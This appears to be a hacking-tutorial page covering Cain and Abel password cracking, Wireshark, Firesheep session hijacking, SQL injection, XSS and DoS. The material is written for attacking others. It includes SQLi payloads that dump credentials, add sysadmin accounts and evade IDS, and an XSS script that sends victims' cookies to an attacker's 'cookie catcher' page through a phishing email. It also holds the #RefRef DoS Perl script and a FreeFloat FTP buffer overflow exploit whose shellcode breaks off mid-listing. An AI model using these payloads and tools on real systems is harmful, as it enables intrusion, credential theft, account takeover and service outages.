Cain and Abel Password Cracking Tool

Cain and Abel (often abbreviated to Cain) is a password recovery tool for Microsoft Windows. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel


Status with virus scanners

Some virus scanners detect Cain and Abel as 'malware'. Avast! detects it as "Win32:Cain-B [Tool]" and classifies it as "Other potentially dangerous program", while Microsoft Security Essentials detects it as "Win32/Cain!4_9_14" and classifies it as "Tool: This program has potentially unwanted behavior." Even if Cain's install directory, as well as the word "Cain", are added to Avast's exclude list, the real-time scanner has been known to stop Cain from functioning. However, the latest ver- sion of Avast no longer blocks Cain.

Features

* WEP cracking

* Speeding up packet capture speed by wireless packet injection

* Ability to record VoIP conversations

* Decoding scrambled passwords

* Calculating hashes

* Traceroute

* Revealing password boxes

* Uncovering cached passwords

* Dumping protected storage passwords

* ARP spoofing

* IP to MAC Address resolver

* Network Password Sniffer

* LSA secret dumper

* Ability to crack:


LM & NTLM hashes NTLMv2 hashes
Microsoft Cache hashes
Microsoft Windows PWL files
Cisco IOS - MD5 hashes
Cisco PIX - MD5 hashes APOP - MD5 hashes
CRAM-MD5 MD5 hashes
OSPF - MD5 hashes
RIPv2 MD5 hashes
VRRP - HMAC hashes
Virtual Network Computing (VNC) Triple DES
MD2 hashes
MD4 hashes
MD5 hashes
SHA-1 hashes
SHA-2 hashes
RIPEMD-160 hashes
Kerberos 5 hashes
RADIUS shared key hashes
IKE PSK hashes
MSSQL hashes
MySQL hashes
Oracle and SIP hashes


Configuration

Configure Cain and Abel Installation Before you do anything with Cain and Abel, you're going to need to configure it. Be sure to install all the drivers and libraries that come with Cain and Abel.

With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration Dialog box will appear. From the list select the device with the MAC Address of Ethernet or Wireless network card that you will be using for hacking. Here is a description of each tab and its configuration:

Sniffer Tab

Allows the user to specify the Ethernet interface and the start up options for the sniffer and ARP features of the application.

ARP Tab

Allows the user to in effect to lie to the network and tell all of the other hosts that your IP is actually that of a more important host on the network like a server or router. This feature is use- ful in that you can impersonate the other device and have all traffic for that device "routed" to you workstation. Keep in mind that servers and routers and designed for multiple high capacity connections. If the device that you are operating from can not keep up with traffic generated by this configuration, the target network will slow down and even come to a halt. This will surly lead to your detection and eventual demise as a hacker as the event is easily detected and tracked with the right equipment.

Filters and Ports

Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right click on one of the services you will be able to change both the TCP and UDP ports. But this will not be necessary for this tutorial, but will be useful future tutorials.

HTTP Fields

Several features of the application such as the LSA Secrets dumper, HTTP Sniffer and ARP-HTTPS will parse the sniffed or stored information from web pages viewed. The more fields that you add to the HTTP and passwords field, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.

Traceroute

Trace route or the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, Net mask resolution, and Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.

Console

This is the command prompt on the remote machine. Anything that you can do on your pc from the CMD prompt can be done from here. Examples include mapping a drive back to your pc and copying all the files from the target or adding local users to the local security groups or anything really. With windows, everything is possible from the command prompt.

Hashes

Allows for the enumeration of user accounts and their associated hashes with further ability to send all harvested information to the cracker.

LSA Secrets

Windows NT and Windows 2000 support cached logon accounts. The operating system default is to cache (store locally), the last 10 passwords. There are registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names and passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computers secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MAC- HINE SECURITYPolicySecrets.

Routes

From this object, you can determine all of the networks that this device is aware of. This can be powerful if the device is multihommed on two different networks.

TCP Table

A simple listing of all of the processes and ports that are running and their TCP session status.

UDP Table

A simple listing of all of the processes and ports that are running and their UDP session status.

Dictionary Cracking

Select all of the hashes and select Dictionary Attack (LM). You could select the NTLM but the process is slower and with few exceptions the NTLM and NT passwords are the same and NT cracks (Guesses) faster. In the Dictionary window, you will need to populate the File window with each of you dictionary files.you have to download the tables.and copy them to cain installation directory, Check the following boxes: As is Password, Reverse, Lowercase, uppercase, and two numbers.)

Dictionary Cracking process

Click start and watch Cain work. The more lists and words that you have, the longer it will take. When Cain is finished, click exit and then look at the NT password column. All of the passwords cracked will show up next to the now owned accounts. Take a second to look carefully at the accounts and passwords in the list. Look for patterns like the use of letters and characters in sequence. Many administrators use reoccurring patterns to help users remember their passwords. Example: Ramius password reset in November would have a user account of RAMNOV. If you can identify patterns like this you can use word generators to create all possible combinations and shorten the window.

Cryptanalysis attacking

Resort your hashes so single out the accounts that you have left to crack. Now select all of the uncracked or guessed accounts and right click on the accounts again and select Cryptanalysis (LM). Add the tables that you downloaded from the net to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click start. This should go pretty quick. Take a second to review your progress and look for additional patterns.

At this point, use program like sam grab that has the ability to determine which accounts are members of the domain administrators group to see if you have gotten any admin level accounts. Once you move to the next step, which is bruting, most of what you have left are long passwords that are going to be difficult and time consuming. Any time saver applications that you can find will be helpful.

Brute Force attack

Repeat the same process for selecting the accounts. Look closely at all of the passwords that you have cracked and look for patterns. First do you see any special characters in any of the passwords cracked. How about numbers? A lot of all upper case of all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The goal is to use the least amount of characters and symbols to get the account that you need. So lets finish it off. Select all of the un cracked accounts and follow the previous steps and select Brute Force (LM). The default for LM is A-Z and 0-9. Based on the other passwords and those accounts with an "*" in the 8 field on how many characters to specify in the password length pull down box. Make your selection and have at it. 123749997 years to completion. If you see this, then you should rethink the need for this account. Working with the application, rainbow tables and password generators can help your narrow down to reasonable time frames to get the job done.


Password cracking using Cain and Abel

- Install Cain and Abel using the default settings

- Start Cain and Abel

- Click on the Cracker tab

- Click somewhere inside the table

- Click on File, Add to list

- Select Import hashes from local system and click next

- Right click on the account you want the password for and select Brute-force attack

- Chose the option you want to use (for windows passwords either LM hashes or NTLM hashes)

- Select the character set you want to use, set the minimum and/or maximum password length if you know   it to decrease the amount of cracking time needed

- Click on Start and wait

Download Cain and Abel for Windows NT/2000/XP/Vista/7 here

Wireshark - Packet Analyzer

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education.



Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user interface, and using pcap to capture packets. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. There is also a terminal-based (non-GUI) version called TShark. Wireshark, and the other programs distributed with it such as TShark, are free software, released under the terms of the GNU General Public License.

Download Wireshark for Windows 32-bit here and Windows 64-bit here


Features

Wireshark is software that "understands" the structure of different networking protocols. It is able to display the encapsulation and the fields along with their meanings of different packets specified by different networking protocols. Wireshark uses pcap to capture packets, so it can only capture the packets on the types of networks that pcap supports.

- Data can be captured "from the wire" from a live network connection or read from a file that recorded   already-captured packets.

- Live data can be read from a number of types of network, including Ethernet, IEEE 802.11, PPP, and   loopback.

- Captured network data can be browsed via a GUI, or via the terminal (command line) version of the utility,   TShark.

- Captured files can be programmatically edited or converted via command-line switches to the "editcap"   program.

- Data display can be refined using a display filter.

- Plug-ins can be created for dissecting new protocols.

- VoIP calls in the captured traffic can be detected. If encoded in a compatible encoding, the media flow can   even be played.

- Raw USB traffic can be captured with Wireshark. This feature is currently available only under Linux.

Wireshark's native network trace file format is the libpcap format supported by libpcap and WinPcap, so it can read capture files from applications such as tcpdump and CA NetMaster that use that format, and its captures can be read by applications that use libpcap or WinPcap to read capture files. It can also read captures from other network analyzers, such as snoop, Network General's Sniffer, and Microsoft Network Monitor.


Package install

There is no Wireshark package for the Ubuntu releases before edgy (6.10) and no Wireshark stable package for Debian too. In these cases you need to download an Ethereal package or to compile Wireshark from source.

Ubuntu releases before Edgy (6.10) - #apt-get install ethereal

Ubuntu releases starting from Edgy (6.10) - #apt-get install wireshark

To launch Wireshark under Ubuntu - #wireshark


Wireshark GUI - Capture Filters

The capture filter syntax is the same as the one used by programs using the Lipcap (Linux) or Winpcap (Windows) library like the famous TCPdump. The capture filter must be set before launching the Wiershark capture, which is not the case for the display filters that can be modified at any time during the capture. The steps to configure a capture filter are the following:

- select capture - options

- Fill the "capture filter" field or click on the "capture filter" button to give a name to your filter to reuse it for   subsequent captures.

- Click on Start to capture data.

The result will show you the source and destination IP address, protocol and info.


Wireshark GUI - Capture Data Packets

- From the Wireshark menubar choose Capture - Interfaces. Next choose the interface (network interface   card or NIC). Or choose Capture - Options and choose the interface.

  IMPORTANT: Turn promiscuous mode off if you don't want a network administrator see you running in that   mode.

- Create a capture filter to prevent Wireshark from capturing all network traffic going through the interface. In   the text field next to the "Capture Filter" button, type host [ip_address] substituting in the IP address you   care about for the [ip_address] part. This will create a filter that passes only that traffic either originating   from or going to the specified host.

- You can also choose the option Capture - Capture Filters. Choose the specific filter and click OK.

- Now you can press Start. Wireshark is now capturing any data involving the specified IP address, whether   as a source or as a destination. Or capturing all data involving the specified interface.

- With the option Go you can choose to view a specific packet. Just type the number of the packet in the   text field and choose Jump to. You can also double click on a specific packet to view the data. An other   window will pop-up with the data information of the specific packet.

- For example, go to Analyze - Follow TCP Stream. You should see the TCP stream content.

yntax examples

tcp dst port 3128 - Displays packets with destination TCP port 3128.

ip src host 10.1.1.1 - Displays packets with source IP address equals to 10.1.1.1.

host 10.1.2.3 - Displays packets with source or destination IP address equals to 10.1.1.1.

src portrange 2000-2500 - Displays packets with source UDP or TCP ports in the 2000-2500 range.

not imcp - Displays everything except icmp packets (icmp is typically used by the Ping tool).

src host 10.7.2.12 and not dst net 10.200.0.0/16 - Displays packets with source IP address equals to 10.7.2.12 and in the same time not with the destination IP network 10.200.0.0/16.


Menu

The eight menus at the top of the platform are used to configure Wireshark

File - Opens or save a capture

Edit - Finds or mark packets

View - Configures the Wireshark platform view

Go - Reach data inside the capture

Capture - Sets capture filters options and starts the capture

Analyze - Sets Analyze options

Statistics - Views Wireshark statistics

Help - Finds local or online support


Display Filter

The display filter is used to search inside captured data obtained with a capture filter. Its search capabilities are more extended than those of the capture filter and it is not necessary to restart the capture when you need to change your filter.

Syntax Examples

snmp || dns || icmp - Display the SNMP or DNS or ICMP traffics.

ip.addr == 10.1.1.1 - Displays the packets with source or destination IP address equals to 10.1.1.1.1.

tcp.port == 25 - Display packets with TCP source or destination port 25.

tcp.dstport == 25 - Display packets with TCP destination port 25.


Packet List Pane

The packet list pane displays all the captured packets. You can get information such as the source or destination MAC/IP addresses, the TCP/UDP ports number, the protocol or the packet content. If an OSI layer 2 packet is captured you will see MAC addresses in the source and destination columns and, of course, nothing in the port column. If an OSI layer 3 or upper packet is captured you will see IP addresses in the source and destination columns. The port column is populated only if the packet is at the layer 4 or upper.
You can add/remove columns or change some colors in the pane as follows Edit menu - Preferences


Packet Details Pane

The packet details pane gives in depth information about a packet selected in the packet list pane. The information is displayed per OSI layer and can be expanded and collapsed.


Dissector Pane

The dissector panel also called "packet bytes pane" by Wireshark, displays the same information as those provided on the packet details pane but in the hexadecimal style.


Miscellanous

At the bottom of the platform you can find the following information:

- The network card used for the capture.

- If the capture is running or stopped.

- Where the capture is stored on the hard drive.

- the capture size.

- the number of captured packets. (P)

- the number of displayed packets. (D) (Packets matching the display filter)

- the number of marked packets. (M)

Hijack websessions with Firesheep

Firesheep is a Firefox extension used to hijack web sessions usuall used over WiFi networks. Firesheep doesn't steal usernames and passwords. Instead it copies session cookies used on authentication websites. These are then used to impersonate the hijack connection.

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.

It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.

Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely?

After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:

Double-click on someone, and you're instantly logged in as them.

Firesheep is free (open source) and is available now for Mac OS X and Windows. Linux support is on the way. Download Firesheep here

SQL Injection

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks


SQL Injection

SQL Injection is one of the most common web attacks. You attack the web application, ( ASP, JSP, PHP, CGI) rather than the webserver or the services running on the OS. SQL Injection is a way to trick using a query or command as a input via webpages. Most websites take parameters from the user like username and password or even their emails. They all use SQL querys.

You should start with something simple:

Login:' or 1=1--
Pass:' or 1=1--
http://website/index.asp?id=' or 1=1--

These are simple ways to try other query's:

' having 1=1--
' group by userid having 1=1--
' union select sum(columnname) from tablename--


Gathering Infomation:

' or 1 in (select @@version)--
' union all select @@version--

Those will find the actual version of the computer, OS/service pack. Data types:

Oracle

-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB

MySQL

-->mysql.user
-->mysql.host
-->mysql.db

MS access

-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server

-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases


Grabbing passwords:

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --


Create DB accounts:

MS SQL

exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'

MySQL

INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access

CREATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)

CREATE USER name WITH PASSWORD 'pass123'

Oracle

CREATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;


MySQL OS Interaction

' union select 1,load_file('/etc/passwd'),1,1,1;


Server name and config:

' and 1 in (select @@servername)--
' and 1 in (select servername from master.sysservers)--


Retrieving VNC password from registry:

'; declare @out binary(8)
exec master..xp_regread
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'SOFTWARE\ORL\WinVNC3\Default'
@value_name='password'
@value = @out output
select cast (@out as bigint) as x into TEMP--
' and 1 in (select cast(x as varchar) from temp)--


IDS Signature Evasion:

Evading ' OR 1=1 Signature

' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing
' ' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3


mySQL Input Validation Circumvention using Char():

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));


IDS Signature Evasion using comments:

-->'/**/OR/**/1/**/=/**/1>br> -->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')


Strings without quotes

--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)




SQL Exploit Scanner

Download SQL Poizon v 1.1 Exploit Scanner here


Select engine. For example Google API or Proxify Search.

Select country. For example United States or United Kingdom.

Select dorks. For example PHP or SQL.

And scan for vulnerable website's.

XSS Attack - Cross Site Scripting

Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client side script into web pages viewed by other users. An exploited cross site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigat- ions implemented by the site's owner.


Cross Site Scripting

Cross Site scripting holes are web-application vulnerabilities which allow attackers to bypass client- side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page-content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

Non-persistent

Non-persistent XSS vulnerabilities in Google could allow malicious sites to attack Google users who visit them while logged in. The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request.

Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection. A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue.

At first blush, this does not appear to be a serious problem: by submitting a malicious input to the web site, the user would only be able to compromise their own security context—that is, their own browser cookies, cache objects, and so forth. It is important to realize, however, that a third-party attacker may easily place hidden frames or deceptive links on unrelated sites and cause victims' browsers to navigate to URLs on the vulnerable site automatically—often completely in the back- ground—and in such a case, the attacker can intrude into the security context that rightfully belonged to the victim.

In this method you will make the victim admin go to your link. First you will pick a XSS vulnerable website. For this method you will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vuln search.php in the textbox for the word to search for type:

Code:

(script)alert(document.cookie)(/script)

NOTE: You have to change the () of the script tag into <> to execute the code. Just use the HTML code for the script tag.

Click the search button. If you see a javascript popup means its vuln to Non-Persistent XSS attack. Now you will do something similar.

Code:

(script)document.location="www.examplecom/cookie catcher.php?c=" + document.cookie(/script)

NOTE: You have to change the () of the script tag into <> to execute the code. Just use the HTML code for the script tag.


Now go to http://www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vulnerable website and send a fake mail from a online fake mailer. Now in the body just tell something fake like: "I found a bug in your website! And give the shrinked link of the search.php which you added the code infront of it to him. So the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does or changes his password you can still login as him.


Persistent

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.

Persistent XSS can be more significant than other types because an attacker's malicious script is rendered automatically, without the need to individually target victims or lure them to a third-party website. Particularly in the case of social networking sites, the code would be further designed to self-propagate across accounts, creating a type of a client-side worm.

The methods of injection can vary a great deal; in some cases, the attacker may not even need to directly interact with the web functionality itself to exploit such a hole. Any data received by the web application that can be controlled by an attacker could become an injection vector.

Code:

(iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.examplecom/cookie catcher.php?c=" + document.cookie)(/iframe)

NOTE: You have to change the () of the iframe tag into <> to execute the code. Just use the HTML code for the iframe tag.

Then post it in the forum or the comment box. Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a (iframe src="www.google.com")(/iframe) and you will understand iframes more.

NOTE: The site needs to have cookies supported! A blank javascript means you need to go to another site.

Exploit scenarios

Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.

Non-persistent:

- A often visits a particular website, which is hosted by B. B's website allows Alice to log in with a   username/password pair and stores sensitive data, such as billing information.

- M observes that Bob's website contains a reflected XSS vulnerability.

- M crafts a URL to exploit the vulnerability, and sends A an email, enticing her to click on a link for the URL   under false pretenses. This URL will point to Bob's website, but will contain M's malicious code, which the   website will reflect.

- A visits the URL provided by Mallory while logged into Bob's website.

- The malicious script embedded in the URL executes in A's browser, as if it came directly from B's server   (this is the actual XSS vulnerability). The script can be used to send A's session cookie to M. M can then   use the session cookie to steal sensitive information available to Al (authentication credentials, billing info,   etc.) without A's knowledge.


Persistent attack:

- M posts a message with malicious payload to a social network.

- When B reads the message, M's XSS steals B's cookie.

- M can now hijack B's session and impersonate B.


Framework:

A Browser Exploitation Framework could be used to attack the web site and the user's local environment.


Related vulnerabilities

Several classes of vulnerabilities or attack techniques are related to XSS: cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege. HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).

Cross Site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.

SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered any SQL statements can be executed by the application.


XSS (Cross Site Scripting) Examples

NOTE: You have to change all the () in the codes into <> to execute the code. Just use the HTML code for the tags.

XSS locator

If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a compact XSS injection check. View source after injecting it and look for XSS verses <XSS to see if it is vulnerable:

'';!--"=&{()}

Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well:

(IMG SRC="javascript:alert('XSS');")

No quotes and no semicolon:

(IMG SRC=javascript:alert('XSS'))

Case insensitive XSS attack vector:

(IMG SRC=JaVaScRiPt:alert('XSS'))

Malformed IMG tags. This XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. This would make it significantly more difficult to correctly parse apart an HTML tag:

(IMG """)(SCRIPT)alert("XSS")(/SCRIPT)")

Extraneous open brackets. The double slash comments out the ending extraneous bracket to supress a JavaScript error:

((SCRIPT)alert("XSS");//((/SCRIPT)

XSS with no single quotes or double quotes or semicolons:

(SCRIPT)a=/XSS/
alert(a.source)(/SCRIPT)

End title tag. This is a simple XSS vector that closes

(/TITLE)(SCRIPT)alert("XSS");(/SCRIPT)

Remote Style Sheet (using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression.) This only works in IE and in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. NOTE: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:

(LINK REL="stylesheet" HREF="http://victim.org/xss.css")

Remote Style Sheet 2 (the same as above but uses a (STYLE) tag instead of a (LINK) tag). You can remove the end (/STYLE) tag if there is HTML immediately after the vector to close it:

(STYLE)@import'http://victim.org/xss.css';(/STYLE)

Browser Crusher , arrrrrrr Or Denial of Service - DoS - Vulnerability

A Denial of Service Attack (DoS Attack) or Distributed Denial of Service Attack (DDoS Attack) is an attempt to make a computer resource unavailable to its intended users. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.

======================================================================


Firefox 3.6.3 window.print() DoS version 2

Tested on: Firefox 3.6.3 on OSX 10.6.3 and Safari 4.0.5 on OSX 10.6.3

Credits:

Asheesh kumar Mani Tripathi


NOTE: Open the HTML page in your browser will execute a DoS Attack on your own system!

=======================================================================


0day Mozilla Firefox 3.6.12 Remote Denial of Service

Tested on: Firefox 3.6.12

Credits:

Emanuele 'emgent' Gentili -

Alessandro 'scox' Scoscia -

NOTE: Open the HTML page in your browser will execute a DoS Attack on your own system!

=======================================================================


All browsers 0day Crash Exploit

Tested on: Mozilla Firefox - Internet Explorer - Google Chrome - Netscape - Opera

Credits:

Inj3ct0r Team


NOTE: Open the HTML page in your browser will execute a DoS Attack on your own system!

=======================================================================


All Browsers - Long Unicode DoS PoC

Tested on: All browsers

Credits:

Dr_IDE

NOTE: Open the HTML page in your browser will execute a DoS Attack on your own system!

=======================================================================


Google Chrome v8.0.552.237 address overflow DoS

Tested on: Windows XP - SP2 (EN) - Windows 7 x64

Credits:

Vuk Ivanovic , whysoserious

NOTE: Open the HTML page in your browser will execute a DoS Attack on your own system!

=======================================================================



IE6 / 7 Remote Dos vulnerability

Tested on: Windows Xp Sp3

Credits:

Richard Leahy , why so serious , hans J3ct0r 

NOTE: Open the HTML page in your browser will execute a DoS Attack on your own system!


Stay tuned , there will be more + im sorry because cant upload it , it crush my browser + my system .
I will try again . 

#RefRef - Denial of Service (DDoS) tool developed by Anonymous released

#RefRef

#RefRef was programmed in:

- Perl

- Python

- Javascript


Second Attack to test the aplication - #RefRef executed in Perl - Anonymous

#RefRef programmed in Perl:

#!usr/bin/perl

#RefRef (C) Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;

$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

$nave->timeout(5);

head();

if($ARGV[0]) {

now($ARGV[0]);

} else {

sintax();

}

copyright();

sub now {

print "\n[+] Target : ".$_[0]."\n";

print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";

while(true) {

$SIG{INT} = \&adios;

$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");

unless($code->is_success) {

print "[+] Web Off\n";

copyright();

}}}

sub adios {

print "\n[+] Stoping attack\n";

copyright();

}

sub head {

print "\n\n-- == #RefRef == --\n\n";

}

sub copyright {

print "\n\n-- == RefRef == --\n\n";

exit(1);

}

sub sintax {

print "\n[+] Sintax : $0 \n";

}

sub toma {

return $nave->get($_[0]);

}

# ¿ The End ?

Download #RefRef here

FreeFloat FTP Server ACCL Buffer Overflow Exploit

#!/usr/bin/python

#

#[+]Exploit Title: FreeFloat FTP Server ACCL Buffer Overflow Exploit

#[+]Date: 01\0602\2012

#[+]Author: mortis

#[+]Software Link: here


#[+]Version: 1.00

#[+]Tested On: Windows XP SP3 English

#[+]CVE: N/A

#


from socket import *

import sys, struct, os


&def sploit(host, port):

      #open listener shell on port 4444


      sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"

      sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"

      sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"

      sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"

      sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"

      sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"

      sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"

      sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"

      sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"

      sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"

      sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"

      sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"

      sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"

      sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"

      sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"

      sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"

      sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"

      sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"

      sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"

      sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"

      sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"

      sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"

